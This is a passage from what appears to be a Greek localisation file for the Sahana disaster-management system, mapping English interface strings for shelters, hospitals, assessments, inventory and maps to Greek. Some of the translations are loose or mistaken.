'Evaluate the information in this message. (This value SHOULD NOT be used in public warning applications.)': 'Αξιολογήστε τις πληροφορίες σε αυτό το μήνυμα. (Η τιμή/αξιολόγηση δεν πρέπει να χρησιμοποιηθέι σε εφαρμογές δημόσιας προειδοποίησης)',
'Event Type': 'Τύπος Συμβάντος',
'Event type': 'Τύπος Συμβάντος',
'Example': 'Παράδειγμα',
'Expected Out': 'Ανεμένται να είναι εκτός',
'Expiry_Date': 'Ημερομηνία_Λήξης',
'Export Data': 'Εξαγωγή δεδομένων',
'Export in GPX format': 'Εξαγωγή σε GPX μορφότυπο',
'Eye Color': 'Χρώμα ματιών',
'Facial hair, color': 'Κόμη, χρώμα',
'Family tarpaulins, source': 'Οικογενειακοί μουσαμάδες, πηγή',
'Family/friends': 'Οικογένεια / φίλους',
'Feature Layer updated': 'Επίπεδο χαρακτηριστικών αναβαθμίστηκε',
'Feature Type': 'Τύπος Χαρακτηριστικού',
'Female headed households': 'Μητριαρχικά νοικοκυριά',
'Few': 'Ελάχιστα',
'Find Recovery Report': 'Βρείτε Έκθεση Ανάκτησης',
'Find': 'Αναζήτησε',
'Fingerprinting': 'Δακτυλικά αποτυπώματα',
'First name': 'Κυρίως όνομα',
'Flood Report Details': 'Λεπτομέρειες αναφοράς πλυμμήρας',
'Flood': 'Πλημμύρα',
'Focal Point': 'Σημείο Εστίασης',
'Food Supply': 'Προμήθεια τροφίμων',
'For each sync partner, there is a default sync job that runs after a specified interval of time. You can also set up more sync jobs which could be customized on your needs. Click the link on the right to get started.': 'Για κάθε συγχρονισμό μεταξύ συνεργατών, υπάρχει μια προεπιλεγμένη διεργασία συγχρονισμού που τρέχει μετά από ένα ορισμένο χρονικό διάστημα. Μπορείτε επίσης να δημιουργήσετε περισσότερες διεργασίες συγχρονισμού η οποίες θα μπορούσαν να προσαρμοστούν στις ανάγκες σας. Κάντε κλικ στο σύνδεσμο δεξιά για να ξεκινήσετε.',
'Formal camp': 'Κανονικό Στρατόπεδο',
'Format': 'Μορφότυπος - Δομή',
'Found': 'Ευρέθηκε',
'Foundations': 'Θεμέλια',
'Full beard': 'Γενειοφόρος',
'Further Action Recommended': 'Προτείνονται περαιτέρω ενέργειες',
'GPS Marker': 'Δείκτης GPS',
'Gap Map': 'Χάρτης κενών "GAP"',
'General emergency and public safety': 'Γενική ανάγκη και δημόσια ασφάλεια',
'Generator': 'Δημιουργός',
'Global Messaging Settings': 'Γενικές Ρυθμίσεις Μηνυμάτων',
'Glossary': 'γλωσσάριο',
'Greek': 'ελληνικά',
'Group Members': 'Μέλη Ομάδας',
'Group Type': 'Τύπος ομάδας',
'Group added': 'Ομάδα προστέθηκε',
'Group description': 'Περιγραφή ομάδας',
'Group type': 'Τύπος Ομάδας',
'Group': 'Ομάδα',
'Hair Style': 'Τύπος μαλιών',
'Has data from this Reference Document been entered into Sahana?': 'Έχουν εισαχθεί δεδομένα για το συγκεκριμένο Έγγραφο Αναφοράς στο Sahana;',
'Has only read-only access to records relating to this Organization or Site.': 'Έχει μόνο πρόσβαση για ανάγνωση εγγραφών που σχετίζονται με αυτό τον Οργανισμό ή την Περιοχή',
'Header Background': 'Υπόβαθρο Επιγραφής-Κεφαλίδας',
'Health center': 'Κέντρο Υγείας',
'Health': 'Υγεία',
'History': 'Ιστορικό',
'Hit the back button on your browser to try again.': 'Πατήστε το κουμπί "Πίσω" στον browser σας για να προσπαθήσετε ξανά.',
'Hospital Details': 'Λεπτομέρειες Νοσοκομείου',
'Hospital information added': 'Προσατέθηκαν πληροφορίες Νοσοκομείων',
'Hospital': 'Νοσοκομείο',
'Hot Spot': 'Θερμό Σημείο',
'How many Boys (0-17 yrs) are Dead due to the crisis': 'Πόσα αγόρια (0-17 ετών) είναι νεκρά εξαιτίας της κρίσης',
'How many Boys (0-17 yrs) are Injured due to the crisis': 'Πόσα παιδιά (0-17 ετών) έχουν τραυματιστεί εξ΄ αιτίας της κρίσης',
'How many Girls (0-17 yrs) are Injured due to the crisis': 'Πόσα κορίτσια (0-17 ετών) έχουν τραυματιστεί εξαιτίας της κρίσης',
'How many Men (18 yrs+) are Dead due to the crisis': 'Πόσοι άντρες (18 ετών και άνω) είναι νεκροί λόγω της κρίσης',
'How many Women (18 yrs+) are Injured due to the crisis': 'Πόσες γυναίκες (18 ετών +) τραυματίσθηκαν εξαιτίας της κρίσης',
'How much detail is seen. A high Zoom level means lot of detail, but not a wide area. A low Zoom level means seeing a wide area, but not a high level of detail.': 'Πόση λεπτομέρεια είναι ορατή. Υψιλό επίπεδο εστίασης σημαίνει μεγαλύτερη λεπτομέρεια αλλά όχι σε ευρεία περιοχή. Χαμηλό επίπεδο εστίασης σημαίνει εποπτεία μεγαλύτερης περιοχής, αλλά όχι με υψηλό επίπεδο λεπτομέριεας.',
'Hygiene NFIs': 'Υγιεινή NFIs',
'Hygiene kits, source': 'Κιτ προσωπικής υγιεινής, προμηθευτής',
'Hygiene practice': 'Πρακτική υγιεινής',
'Ice Pressure': 'πίεση πάγου',
'Identification label of the Storage bin.': 'Καρτέλα αναγνώρσισης-ταύτισης στο καλάθι αποθήκευσης',
'Identity': 'Ταυτότητα - Αναγνωριστικό',
'If yes, specify what and by whom': 'Εαν ΝΑΙ, προσδιόρισε ΤΙ, και από ΠΟΙΟΝ',
'If you need to add a new document then you can click here to attach one.': 'Εαν πρέπει να προσθέσετε νέο έγγραφο μπορείτε να κάνετε κλικ εδώ να επισυνάψετε ένα',
'If you would like to help, then please': 'Εαν θέλετε να βοηθήσετε, τότε παρακαλώ',
'Image/Attachment': 'Εικόνα/συνημμένο',
'Impact Assessments': 'Εκτίμηση Επιπτώσεων',
'Impact Details': 'Λεπτομέρειες Επιπτώσεων',
'Impact Type added': 'Τύπος επιπτώσεων προστέθηκε',
'Impact updated': 'Αντίκτυπος-Επιπτώσεις επικαιροποιήθηκαν',
'Import & Export Data': 'Εισαγωγή και εξαγωγή δεδομένων',
'Import Jobs': 'Εισαγωγή εργασιών',
'Import if Master': 'Εισαγωγή, εαν είστε κύριος.',
'Import job created': 'Εργασία εισαγωγής δημιουργήθηκε',
'Import multiple tables as CSV': 'Εισαγωγή πολλαπλών πινάκων σαν CSV',
'Important': 'Σημαντικό',
'Imported': 'Εισάχθηκε',
'In GeoServer, this is the Layer Name. Within the WFS getCapabilities, this is the FeatureType Name part after the colon(:).': 'Στον Geosrver, αυτό είναι το όνομα του επιπέδου. Μέσα στο WFS getCapabilities, αυτό είναι το τμήμα FeatureType Name μετά τα διαλυτικά (:). ',
'Incident Report Details': 'Λεπτομέρειες Έκθεσης Περιστατικού ',
'Incident Report added': 'Αναφορά Συμβάντος προστέθηκε',
'Incident Report deleted': 'Αναφορά συμβάντος διαγράφηκε',
'Incident': 'Συμβάν',
'Incidents': 'περιστατικά',
'Informal camp': 'Άτυπη κατασκήνωνση/στρατόπεδο',
'Information gaps': 'Κενά πληροφοριοδότησης',
'Infusion catheters needed per 24h': 'Καθετήρες έγχυσης που απαιτούνται ανά 24ώρο',
'Infusions available': 'Εγχύσεις / Ενέσεις Διαθέσιμες',
'Instant Porridge': 'Στιγμιαίος πουρές',
'International NGO': 'Διεθνής Μη Κυβερνητικός Οργανισμοός',
'International Organization': 'Διεθνής Οργανισμός',
'Invalid Query': 'Μη έκγυρη ερώτηση / αναζήτηση',
'Invalid ticket': 'Μη έγκυρο εισητήριο',
'Inventory of Effects': 'Κατάλογος των συνεπειών',
'Item Catalog added': 'Προστέθηκε Κατάλογος αντικειμένων',
'Item Catalog deleted': 'Κατάλογος Αντικειμένων Διαγράφηκε',
'Item Category added': 'Αντικείμενο Καταλόγου Κατηγορίας προστέθηκε',
'Item Category': 'Κατηγορία αντικειμένου καταλόγου',
'Item Category deleted': 'Αντικείμενο Κατηγορίας διαγράφηκε',
'Item Pack Details': 'Λεπτομέρειες Πακέτου Αντικειμένου',
'Item Pack updated': 'Πακέτο Αντικειμένου επικαιροποιήθηκε',
'Item Sub-Category updated': 'Υπο-κατηγορία Αντικειμένου ενημερώθηκε',
'Item already in Bundle!': 'Αντικείμενο ήδη σε πακέτο (συσκευασμένο)',
'Item deleted': 'Αντικείμενο διαγράφηκε',
'Item updated': 'Αντικείμενο μεταφορτώθηκε',
'Items': 'Είδη',
'Jew': 'Ιουδαίος',
'Key': 'Κλειδί (key)',
'Kit Details': 'Λεπτομέρειες kit',
'Kit deleted': 'Kit διαγράφηκε',
'LICENSE': 'Άδεια Χρήσης',
'LMS Administration': 'Διαχείριση LMS',
'Label': 'Ετικέτα',
'Lack of transport to school': 'Έλλειψη μεταφορικού μέσου προς στο σχολείο',
'Last updated on': 'Τελευταία ενημέρωση στις',
'Latest Information': 'Τελευταίες πληροφορίες',
'Latitude & Longitude': 'Γεωγραφικό Πλάτος & Γεωγραφικό Μήκος',
'Latitude is North-South (Up-Down). Latitude is zero on the equator and positive in the northern hemisphere and negative in the southern hemisphere.': 'Το Γεωγραφικό Πλάτος είναι από το Βορά προς το Νότο. Το Γεωγραφικό πλάτος είναι μηδέν στον ησιμερινό, θετικό στο Βόρειο ημισφαίριο και αρνητικό στο Νότιο ημισφαίριο',
'Latitude': 'Γεωγραφικό Πλάτος',
'Layer deleted': 'Layer διαγράφηκε',
'Layer updated': 'Επίπεδο δεδομένων ενημερώθηκε',
'Layers updated': 'Επίπεδα ενημερώθηκαν',
'Length': 'Μήκος',
'Level 1 Assessment deleted': 'Αξιολόγηση Επιπέδου 1 διαγράφηκε',
'Linked records': 'Συνδεδεμένα αρχεία-εγγραφές',
'List / Add Baseline Types': 'Λίστα / Προσθήκη Βασικών Τύπων',
'List All Memberships': 'Κατάλογος όλων των μελών',
'List All': 'Κατάλογος Όλων',
'List Assessment Summaries': 'Κατάλογος περιλήψεων εκτιμήσεων',
'List Assessments': 'Κατάλογος Αξιολογήσεων ',
'List Baseline Types': 'Είδη Αρχικοποίησης Καταλόγου',
'List Baselines': 'Κατάλογος Baselines',
'List Checklists': 'Κατάλογοι ελέγχου Κατάλογων',
'List Distributions': 'Κατάλογος Διανομών',
'List Groups': 'Κατάλογος Ομάδων',
'List Item Categories': 'Λίστα Κατηγοριών Αντικειμένων',
'List Item Sub-Categories': 'Λίστα υπό-κατηγοριών αντικειμένων',
'List Items': 'Κατάλογος Αντικειμένων',
'List Kits': 'Κατάλογος Kits',
'List Locations': 'Κατάλογος τοποθεσιών',
'List Members': 'Κατάλογος Μελών',
'List Memberships': 'Κατάλογος μελών',
'List Messages': 'Κατάλογος Μυνημάτων',
'List Metadata': 'Κατάλογος Μετα-δεδομένων',
'List Needs': 'Λίστα Αναγκών',
'List Resources': 'Λίστα Πόρων',
'List Rivers': 'Κατάλογος Ποταμών',
'List Roles': 'Κατάσταση Ρόλων',
'List Shipment/Way Bills': 'Κατάσταση αποστολών αντικειμένων / Τιμολόγια-Λογαριασμοί',
'List Sites': 'Κατάλογος Περιοχών',
'List Skills': 'Κατάλογος δεξιοτήτων-προσόντων',
'List Staff': 'Κατάλογος Προσωπικού',
'List Storage Location': 'Καταάλογος θέσεων Αποθηκών',
'List Subscriptions': 'Κατάλογος εγγραφών',
'List Survey Series': 'Κατάλογος Σειράς Ερευνών',
'List Tickets': 'Κατάλογος "εισητηρίων"',
'List Units': 'Κατάλογος Μονάδων',
'List Users': 'Κατάλογος Χρηστών',
'List Warehouses': 'Κατάλογος Αποθηκών',
'List all': 'Λίστα όλων',
'List unidentified': 'Κατάλογος μη αναγνωρισμένων',
'List': 'Λίστα - Κατάλογος',
'List/Add': 'Κατάλογος/Προσθήκη',
'Lists "who is doing what & where". Allows relief agencies to coordinate their activities': 'Κατάλογοι " Ποιός κάνει τι και που". Επιτρέπει στους εμπλεκόμενους φορείς να συντονίζουν τις ενέργειές τους.',
'Live Help': 'Ζωντανή Βοήθεια',
'Local Name': 'Τοπικό Όνομα',
'Location deleted': 'Τοποθεσία διαγράφηκε',
'Log entry deleted': 'Καταγραφή (Log) διαγράφηκε',
'Log entry updated': 'Ανανεώθηκε εισαγωγή καταγραφής',
'Login': 'Σύνδεση',
'Logo': 'Λογότυπο',
'Logout': 'Έξοδος',
'Longitude is West - East (sideways). Longitude is zero on the prime meridian (Greenwich Mean Time) and is positive to the east, across Europe and Asia. Longitude is negative to the west, across the Atlantic and the Americas.': 'Το Μήκος είναι από Δυτικά προς Ανατολικά. Το Μήκος είναι 0 στον πρώτο μεσημβρινό (Μεσημβρινός του Greenwitch) και είναι θετικό προς τα ανατολικά κατά μήκος της Ερώπης και της Ασίας. Το Μήκος είναι αρνητικό προς τα Δυτικά κατά μήκος του Ατλαντικού και στην Αμερική.',
'Looting': 'Λεηλασία',
'Major outward damage': 'Κύρια εξωρερική ζημιά',
'Manage Sub-Category': 'Διαχείριση Υπο-Κατηγορίας',
'Manage volunteers by capturing their skills, availability and allocation': 'Διαχείρισης εθελοντών με καταγραφή και χρήση, ικανοτήτων, διαθεσιμότητα & θέση',
'Managing, Storing and Distributing Relief Items': 'Διαχείρηση, Αποθήκευση και διανομή υλικού βοήθειας',
'Managing, Storing and Distributing Relief Items.': 'Διαχείρηση, Αποθήκευση και διανομή υλικού βοήθειας',
'Many': 'Πολλά',
'Map Service Catalog': 'Κατάλογος Χαροτγραφικών Υπηρεσιών',
'Map Width': 'Πλάτος Χάρτη',
'Map': 'χάρτης',
'Marital Status': 'Οικογενειακή κατάσταση',
'Marker Details': 'Λεπτομέρειες Marker',
'Marker added': 'Προστέθηκε δείκτης (marker)',
'Master Message Log to process incoming reports & requests': 'Συνολική Καταγραφή μηνυμάτων (Log) για την επεξεργασία εισερχομένων αναφορών και αιτημάτων ',
'Master Message Log': 'Κύρια καταγραφή μηνυμάτων (Master log)',
'Matrix of Choices (Only one answer)': 'Πίνακας επιλογών (Μόνο μία απάντηση)',
'Maximum weight capacity of the Storage Location followed by choosing the unit from the drop down list.': 'Μέγιστη δυνατότητα βάρους αποθήκευσης του αποθηκευτικού χώρου, που ακολουθείται από την επιλογή της μονάδας από αναδυόμενο menu επιλογών ',
'Member removed from Group': 'Η ιδιότητα μέλους διαγράφηκε',
'Membership updated': 'Ενημέρωση Συνδρομής Μέλους',
'Message Details': 'Λεπτομέρειες Μυνήματος',
'Message added': 'Μηνύμα Προστέθηκε',
'Message': 'Μήνυμα',
'Metadata added': 'Μεταδεδομένα προστέθηκαν',
'Metadata': 'Μεταδεδομένα',
'Meteorological (inc. flood)': 'Μετεορολογικό (συμπ. πλημμύρας)',
'Migrants or ethnic minorities': 'Μετανάστες ή Εθνικές μειονότητες',
'Military': 'Στρατιωτικό',
'Miscellaneous': 'Διάφορα',
'Moderator': 'Μεσολαβητής(Moderator)',
'Modify Information on groups and individuals': 'Τροποποίησε πληροφορίες σε ομάδες ή άτομα',
'Monday': 'Δευτέρα',
'More': 'περισσότερο',
'Multiplicator': 'Πολλαπλασιαστής',
'Municipalities': 'δήμοι',
'Municipality': 'δήμος',
'N/A': 'Μη Εφαρμόσιμο (Μ/Ε)',
'Name and/or ID': 'Όνομα ή/και ID',
'Name of Storage Bin Type.': 'Όνομα τύπου αποθηκευτικού μέσου',
'Name': 'Όνομα',
'Name/Model/Type': 'Όνομα/Μοντέλο/Τύπος',
'National ID Card': 'Αριθμός (Εθνικής) Ταυτότητας',
'National NGO': 'Εθνικός μη Κυβερνητικός Οργανισμός',
'Nationality': 'Εθνικότητα',
'Nautical Accident': 'Ναυτικό Συμβάν',
'Nautical Hijacking': 'Ναυτική Πειρατεία',
'Need Type added': 'Τύπος ανάγκης προστέθηκε',
'Need to specify a role!': 'Πρέπει να καθορίσετε ένα ρόλο!',
'New Checklist': 'Νέος κατάλογος ελέγχου',
'New Request': 'Νέο αίτημα',
'New': 'Νέο',
'No Addresses currently registered': 'Δεν έχει καταγραφεί ακόμη Διεύθυνση',
'No Assessments currently registered': 'Δεν έχουν εγγραφεί ακόμη Εκτιμήσεις',
'No Baseline Types currently registered': 'Δεν υπάρχουν Τύποι Αρχικοποίησης δηλωμένοι προς το παρών',
'No Baselines currently registered': 'Δεν έχουν καταχωρηθεί ακόμη baselines',
'No Bundles currently registered': 'Δεν υπάρχουν πακέτα προς το παρών δηλωμένα',
'No Category<>Sub-Category<>Catalog Relation currently registered': 'Χωρίς Κατηγορία<>Υπο-Κατηγορία<>Υπάρχει εγγεραμένη σχέση των καταλόγων',
'No Cluster Subsectors currently registered': 'Δεν έχει καταγραφεί ακόμη ομάδα υποκατηγοριών',
'No Distribution Items currently registered': 'Δεν έχουν εγγραφεί ακόμη αντικείμενα για διανομή',
'No Groups currently defined': 'Δεν έχουν οριστεί ακόμη Ομάδες',
'No Hospitals currently registered': 'Δεν υπάρχουν Νοσκομεία Καταγεγραμένα',
'No Image': 'Χωρίς Εικόνα',
'No Images currently registered': 'Δεν έχουν καταχωρηθεί εικόνες',
'No Impact Types currently registered': 'Δεν είναι ακόμη καταχωρημένοι ακόμη τύποι Επιπτώσεων',
'No Incidents currently registered': 'Δεν έχουν καταγραφεί περιστατικά ακόμη',
'No Item Catalog Category currently registered': 'Καμία κατηγορία καταλόγου αντικειμένων δεν έχει ακόμη εγγραφεί',
'No Markers currently available': 'δεν υπάρχουν διαθέσιμοι δείκτες (μαρκαδόροι - markers)',
'No Matching Records': 'Δεν βρέθηκαν εγγραφές ',
'No Members currently registered': 'Δεν έχουν εγγραφεί ακόμη μέλη',
'No Memberships currently defined': 'Δεν έχουν ορισθεί ακόμη συμμετοχές μελών',
'No People currently registered in this shelter': 'Δεν εγγραφεί ακόμη άνθρωποι σε αυτό το καταφύγιο',
'No Persons currently reported missing': 'Δεν έχουν αναφερθεί ακόμη αγνοούμενοι',
'No Photos found': 'Δεν βρέθηκαν φωτογραφίες',
'No Presence Log Entries currently registered': 'Δεν έχουν καταγραφεί ακόμη εισαγωγές παρουσίας',
'No Projections currently defined': 'Δεν έχουν ορισθεί προβολικά συστήματα',
'No Projects currently registered': 'Δεν υπάρχουν Έργα προς το παρών καταχωρημένα',
'No Sections currently registered': 'Δεν έχουν εγγραφεί /οριστεί τμήματα ακόμη',
'No Sectors currently registered': 'Δεν έχουν ακόμη καταγραφεί τομείς',
'No Shelters currently registered': 'Δεν έχουν καταγραφεί ακόμη καταφύγια',
'No Shipment Transit Logs currently registered': 'Δεν έχουν εγγραφεί ακόμη Δελτία αποστολών.',
'No Skill Types currently set': 'Δεν έχουν ορισθεί τύποι προσόντων - ικανοτήτων',
'No Staff Types currently registered': 'Δεν καταχρηθεί ακόμη κατηγορίες Προσωπικού',
'No Storage Bin Type currently registered': 'Δεν έχει καταγραφεί ακόμη τύπος αποθηκευτικού χώρου (Storage Bin)',
'No Survey Questions currently registered': 'Δεν έχουν εγγραφεί ερωτήσεις έρευνας',
'No Survey Sections currently registered': 'Δεν έχουν εγγραφεί κατηγορίες έρευνας ακόμη',
'No Tickets currently registered': 'Δεν έχουν εγγραφεί ακόμη εισητήρια',
'No Units currently registered': 'Δεν έχουν εγγραφεί ακόμη μονάδες',
'No Users currently registered': 'Δεν έχουν εγγραφεί ακόμη χρήστες',
'No Warehouse Items currently registered': 'Δεν έχουν εγγραφεί ακόμη αντικείμενα αποθήκης',
'No Warehouses currently registered': 'Δεν έχουν καταχωρηθεί προς το παρών αποθήκες',
'No access at all': 'Δεν υπάρχει καθόλου πρόσβαση',
'No contact information available': 'Δεν διαθέσιμες πληροφορίες επικοινωνίας',
'No contacts currently registered': 'Δεν έχουν ορισθεί ακόμη σημεία επαφών',
'No data in this table - cannot create PDF!': 'Δεν υπάρχουν δεδομένα στο Πίνακα - Αδύνατη η δημιουργία PDF!',
'No entries found': 'Δεν βρέθηκαν εισαγωγές εγγραφών',
'No linked records': 'Δεν υπάρχουν συνδεδεμένα αρχεία - εγγραφές',
'No pending registrations found': 'Δεν βρέθηκαν εγγραφές σε αναμονή (pending)',
'No pending registrations matching the query': 'Δεν υπάρχουν εκρεμείς εγγραφές που να ταιριάζουν στο ερώτημα',
'No positions currently registered': 'Δεν έχουν εγγραφεί ακόμη θέσεις',
'No problem group defined yet': 'Δεν έχει οριστεί ακόμη ομάδα προβλήματος',
'No report available.': 'Δεν υπάρχει διαθέσιμη αναφορά',
'No service profile available': 'Δεν υπάρχει προφίλ υπηρεσίας διαθέσιμο',
'No synchronization': 'Μη συγχρονισμός',
'No template found!': 'Δεν βρέθηκε πρότυπο !',
'No volunteer information registered': 'Δεν έχουν εγγραφεί πληροφορίες εθελοντών',
'Noodles': 'Ζυμαρικά Noodles',
'Not Applicable': 'Μη εφαρμόσιμο',
'Not Authorised!': 'Μη εξουσιοδοτημένος',
'Not Possible': 'Αδύνατον',
'Not installed or incorrectly configured.': 'Δεν έχει εγκατασταθεί ή λάθος καθορισμένο (configured)',
'Not yet a Member of any Group': 'Κανένα μέλος δεν έχει ακόμη εγγραφεί',
'Notice to Airmen': 'Ανακοίνωση προς τα Εναέρια Μέσα',
'Number of Rows': 'Αριθμός γραμμών',
'Number of alternative places for studying': 'Αριθμός εναλλακτικών περοιχών για μελέτη',
'Number of deaths during the past 24 hours.': 'Αριθμός θανάτων το τελευταίο 24ώρο.',
'Number of private schools': 'Αριθμός Ιδιωτικών Σχολείων',
'Number/Percentage of affected population that is Female & Aged 0-5': 'Αριθμός/Ποσοστό πληγέντων που γένους θηλυκού και ηλικίας από 0 έως 5 ετών',
'Number/Percentage of affected population that is Female & Aged 6-12': 'Αριθμός/Ποσοστό πληγέντων που είναι Θηλυκού γένους & ηλικίας 6-12',
'Number/Percentage of affected population that is Male & Aged 0-5': 'Αριθμός/Ποσοστό πληθυσμού που επηράζεται και έναι αγόρια κάτω των 5 ετών',
'Number/Percentage of affected population that is Male & Aged 18-25': 'Αριθμός/Ποσοστό επηρεαζόμενου πληθυσμού που είνια άντρες και ηλικίας από 18 έως 25',
'Number/Percentage of affected population that is Male & Aged 26-60': 'Αριθμός / Ποσοστό του πληγέντος πληθυσμού που είναι άρρεν & Ηλικίας 26-60',
'Nutrition': 'Θρέψη',
'Obstetrics/Gynecology': 'Μαιευτικό/Γυναικολογικό',
'Office Details': 'Λεπτομέρειες Γραφείου',
'Office added': 'Προστέθηκε γραφείο - οργανισμός',
'Office deleted': 'Γραφείο Διαγράφηκε',
'On by default?': "Ενεργό εξ' ορισμού;",
'One-time costs': 'Εφ-άπαξ κόστη',
'Open': 'ανοίγω',
'Operating Rooms': 'Κέντρα Επιχειρήσεων',
'Optional. In GeoServer, this is the Workspace Namespace URI. Within the WFS getCapabilities, this is the FeatureType Name part before the colon(:).': 'Προεραιτικό. Στο GeoServer, αυτό είναι το Workspace Namespace URI. Μέσα στις WFS getCapabilities, αυτό είναι το τμήμα όνοματος FeatureType πριν τα διαλυτικά (:).',
'Options': 'Επιλογές',
'Organization Details': 'Λεπτομέρειες Οργανισμού',
'Organization Registry': 'Οργάνωση Γραμματείας',
'Organization': 'Οργανισμός',
'Organizations': 'Οργανισμοί',
'Origin': 'Προέλευση',
'Other (specify)': 'Άλλο (Περιγράψτε)',
'Other Evidence': 'Λοιπά αποδεικτικά στοιχεία',
'Other Faucet/Piped Water': 'Άλλο πόσιμο νερό (από βρύση-παροχή)',
'Other Isolation': 'Άλλη απομόνωση',
'Other activities of boys 13-17yrs': 'Άλλες δραστηριότητες αγοριών 13 έως 17 ετών',
'Other activities of boys <12yrs before disaster': 'Άλλες δραστηριότητες αγοριών μικρότερων των 12 ετών πριν την καταστροφή',
'Other alternative places for study': 'Άλλες εναλακτικές περιοχές για μελέτη (διάβασμα)',
'Other assistance needed': 'Άλλη απαιτούμενη βοήθεια',
'Other assistance, Rank': 'Άλλη βοήθεια, Ιεραρχήστε',
'Other current health problems, adults': 'Άλλα τρέχοντα προβλήματα υγείας, ενήλικες',
'Other factors affecting school attendance': 'Άλλοι παράγοντες που επηρεάζουν την παρακαλούθηση στο σχολείο',
'Other side dishes in stock': 'Άλλα δευτερεύοντα πιάτα σε απόθεμα',
'Outbound Mail settings are configured in models/000_config.py.': 'Οι ρυθμίσεις του εξερχόμενου Mail καθορίζονται στο models/000_config.py',
'Outgoing SMS handler': 'Διαχειριστής εξερχομένων sms',
'Parent Office': 'Πατρικό Γραφείο',
'Password': 'Συνθηματικό(Password)',
'Pathology': 'Παθολογία',
'Patients': 'Ασθενείς',
'Pediatric Psychiatric': 'Παιδιατρικό Ψυχιατρικό',
'Pediatrics': 'Παιδιατρική',
'Peer Registration Details': 'Λεπτομέρειες εγγραφής peer',
'Peer Registration Request': 'Αίτημα για ελεγχόμενη εγγραφή. ',
'Peer not allowed to push': 'Στον peer δεν επιτρέπεται η προώθηση - push',
'Peer registration request added': 'Αίτημα για ελεγκτή καταχώρησης προστέθηκε',
'Peer': 'Ελεγκτής',
'People Needing Shelter': 'Άτομα που χρειάζονται καταφύγιο',
'Person Details': 'Λεπτομέρειες Ατόμου ',
'Person Registry': 'Δήλωση Ατόμου',
'Person deleted': 'Διαγραφή Ατόμου',
'Person details updated': 'Λεπτομέρειες ατόμου ενημερώθηκαν',
'Person reporting': 'Αναφορά ατόμου',
'Person who observed the presence (if different from reporter).': 'Άτομο το οποίο ανέφερε την παρουσία (εαν είναι δαιφορετικό από αυτόν που αναφέρει)',
'Person': 'Άτομο',
'Personal Effects Details': 'Λεπτομέρεις Προσωπικής επίδρασης',
'Persons in institutions': 'Άτομα σε οργανισμούς',
'Persons with disability (mental)': 'Άτομα με (διανοητική) ανικανότητα ',
'Persons with disability (physical)': 'Άτομα με (φυσικές) ανικανότητες',
'Persons': 'Άτομα',
'Phone 1': 'Τηλέφωνο 1',
'Phone 2': 'Τηλέφωνο 2',
'Phone': 'Τηλέφωνο',
'Photo Details': 'Λεπτομέρειες Φωτογραφίας',
'Please enter a First Name': 'Παρακαλώ εισάγετε το μικρό όνομα',
'Please report here where you are:': 'Παρακαλώ αναφέρατε εδώ τη θέση που βρίσκεστε:',
'Please specify any problems and obstacles with the proper handling of the disease, in detail (in numbers, where appropriate). You may also add suggestions the situation could be improved.': 'Παρακαλώ προσδιορίστε οποιαδήποτε προβλήματα ή εμπόδια για τη σωστή διαχείριση της ασθένειας, με λεπτομέριεα (π.χ. με αριθμούς όπου είναι εφαρμόσιμο). Μπορείτε επίσης να προσθέσετε προτάσεις για την βελτίωση της κατάστασης',
'Please use this field to record any additional information, including a history of the record if it is updated.': 'Παρακαλώ χρησιμοποιήστε αυτό το πεδίο για να καταγράψετε επιπλέον πληροφορίες, συμπεριλαμβανομένου της ιστορικής αναδρομής του πεδίου εάν είναι ενημερωμένο.',
'Pledged': 'Δεσμευμένος',
'Pledges': 'Υποχρεώσεις - Δεσμεύσεις',
'Pollution and other environmental': 'Μόλυνση και άλλα περιβαλλοντικά',
'Porridge': 'Πουρές-Χυλός',
'Port Closure': 'Κλείσιμο Λιμανιού',
'Port': 'Πόρτα',
'Postcode': 'Ταχυδρομικός Κώδικας',
'Presence': 'Παρουσία',
'Priority': 'Προτεραιότητα',
'Problem Administration': 'Διαχειριστικό Πρόβλημα',
'Problem connecting to twitter.com - please refresh': 'Πρόβλημα στη σύνδεση με το twitter.com - πατήστε ανανέωση (refresh)',
'Problem updated': 'Το πρόβλημα ενημερώθηκε',
'Problems': 'Προβλήματα',
'Profile': 'Προφίλ',
'Profiles': 'Προφίλ',
'Project Details': 'Λεπτομέρειες έργου',
'Project updated': 'Το έργο ενημερώθηκε',
'Projection deleted': 'Προβολικό Σύστημα διεγράφηκε',
'Projection updated': 'Προβολή ανανεώθηκε',
'Projects': 'Έργα',
'Province': 'Επαρχία',
'Psychiatrics/Pediatric': 'Ψυχιατρική / Παιδιατρική',
'Public and private transportation': 'Δημόσια και Ιδιωτικά μέσα μεταφοράς',
'Pyroclastic Surge': 'Πυροκλαστική τομή',
'Quarantine': 'Καραντίνα',
'Rapid Assessment added': 'Άμεση εκτίμηση προστέθηκε',
'Rapid Assessment': 'Άμεση Εκτίμηση',
'Real World Arbitrary Units': 'Αυθαίρετες μονάδες που αναφέρονται στο πραγματικό κόσμο',
'Recipients': 'Παραλήπτες',
'Record last updated': 'Η τελευταία εγγραφή ενημερώθηκε',
'Recovery Request updated': 'Αίτημα Ανάσυρσης/Αναζήτησης Ενημερώθηκε',
'Recovery Requests': 'Αιτήματα για ανάκτηση-αναζήτηση',
'Recurring costs': 'Επαναλαμβανόμενα έξοδα',
'Recurring': 'Στρατολόγηση',
'Region': 'περιφέρεια',
'Regional Units': 'περιφερειακές ενότητες',
'Regional': 'Τοπική',
'Regions': 'περιφέρειες',
'Register Person into this Shelter': 'Εγγραφή ατόμου σε αυτό το κατάλλυμα',
'Register Person': 'Εγγραφή Προσώπου',
'Registered users can': 'Οι εγγεγραμμένοι χρήστες μπορούν',
'Relocate as instructed in the <instruction>': 'Αλλαγή θέσης όπως καθοδηγηθήκατε στην καθοδήγηση <instruction>',
'Remove Person from Group': 'Διαγραφή μέλους',
'Remove Person from Team': 'Διαγραφή μέλους',
'Removed from Team': 'Η ιδιότητα μέλους διαγράφηκε',
'Replace if Master': 'Αντικατάσταση εαν είστε κύριος',
'Replace if Newer': 'Αντικατάσταση σε περίπτωση νεότερου',
'Report Another Assessment...': 'Αναφορά Άλλης Αξιολόγησης ...',
'Report Type': 'Αναφορά Τύπου',
'Report a Problem with the Software': 'Αναφορά προβλήματος του λογισμικού',
'Report deleted': 'Αναφορά Διαγράφηκε',
'Report my location': 'Ανέφερε τη θέση μου',
'Report the contributing factors for the current EMS status.': 'Αναφορά των παραγόντων που συμμετέχουν στην παρούσα κατάσταση ανάγκης',
'Report them as found': 'Αναφορά ως ευρεθέντα',
'Report updated': 'Αναφορά επικαιροποιήθηκε',
'Report': 'Αναφορά',
'Reporter': 'Αναφορέας',
'Reports': 'Αναφορά',
'Request Item added': 'Προστέθηκε ζητούμενο αντιείμενο ',
